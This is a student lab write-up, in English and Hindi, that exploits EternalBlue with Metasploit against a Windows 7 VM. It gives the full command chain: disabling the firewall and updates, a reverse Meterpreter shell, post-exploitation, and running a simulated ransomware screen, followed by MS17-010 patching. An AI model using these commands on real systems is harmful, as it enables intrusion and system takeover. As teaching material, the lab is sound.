
Cybersecurity lab demonstrating exploitation of CVE-2017-0144 (EternalBlue) using Metasploit against a vulnerable Windows 7 VM, achieving SYSTEM-level access via Meterpreter. Includes full attack chain, post exploitation, and mitigation via MS17-010 patching, tested in an isolated ethical lab environment.
साइबर सुरक्षा लैब जो CVE-2017-0144 (EternalBlue) का उपयोग करके Metasploit के माध्यम से एक असुरक्षित Windows 7 सिस्टम का शोषण करती है, और Meterpreter के ज़रिए SYSTEM-स्तर की पहुँच प्राप्त करती है।
यह परियोजना WannaCry-शैली के रैनसमवेयर हमले (सुरक्षित डेमो) का अनुकरण भी करती है और MS17-010 सुरक्षा पैच का उपयोग करके शमन प्रदर्शित करती है।
मॉड्यूल: CSCM828 सुरक्षा कमजोरियाँ और पेनिट्रेशन टेस्टिंग
छात्र:
विश्वविद्यालय: Swansea University
MS17-010 EternalBlue SMB रिमोट विंडोज कर्नेल पूल करप्शन
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/
KB4012212 (Windows 7 x64 सुरक्षा अपडेट)
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64
Kali Linux (वर्चुअल मशीन डाउनलोड)
https://www.kali.org/get-kali/#kali-virtual-machines
Windows 7 SP1 Home Premium English x64 (ISO)
https://archive.org/details/windows-7-home-prem-english
VMware Workstation Pro 17.6.4
https://www.vmware.com/products/desktop-hyper
यह लैब प्रदर्शित करता है:
⚠️ यह लैब पूरी तरह से पृथक वातावरण में संचालित की जानी चाहिए।
एडमिनिस्ट्रेटर कमांड प्रॉम्प्ट में चलाएँ:
netsh advfirewall set allprofiles state off
netstat -an | findstr :445
sc stop wuauserv
sc config wuauserv start= disabled
ping <victim-ip>
nmap -p 445 <victim-ip>
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
अपेक्षित:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
meterpreter > getuid
अपेक्षित:
NT AUTHORITY\SYSTEM
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig
ps
migrate <explorer.exe PID>
cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls
setlocal enabledelayedexpansion
set id=%random%-%random%-%random%
set /a timeleft=60
:main
cls
echo ========================================================
echo WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo All files have been encrypted!
echo.
echo Send 0.25 BTC to:
echo 13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo Personal ID: %id%
echo.
echo Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.
echo Initializing encryption...
timeout /t 2 >nul
for /l %%i in (1,1,20) do (
set /a percent=%%i*5
call :progress !percent!
timeout /t 1 >nul
)
goto countdown
:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.
set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx
exit /b
:countdown
cls
:loop
cls
echo ========================================================
echo YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo Pay within the time limit or files will be lost!
echo.
echo Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.
if !timeleft! LEQ 0 goto end
set /a timeleft-=1
timeout /t 1 >nul
goto loop
:end
cls
echo ========================================================
echo TIME EXPIRED
echo ========================================================
echo.
echo Your files are permanently locked.
echo.
echo (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"
.msu फ़ाइल डाउनलोड करेंwusa.exe KB4012212-x64.msu /quiet /norestart
shutdown /r /t 0
systeminfo | findstr KB4012212
अपेक्षित:
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
अपेक्षित:
| समस्या | समाधान |
|---|---|
| एक्सप्लॉइट विफल होता है | कनेक्टिविटी जाँचें |
| कोई सत्र नहीं | फायरवॉल अक्षम करें |
| सत्र समाप्त हो जाता है | एक्सप्लॉइट पुनः प्रयास करें |
| कोई दृश्य विंडो नहीं | explorer.exe पर माइग्रेट करें |
यह परियोजना संचालित की गई है:
अनधिकृत उपयोग उल्लंघन करता है:
यह लैब प्रदर्शित करता है: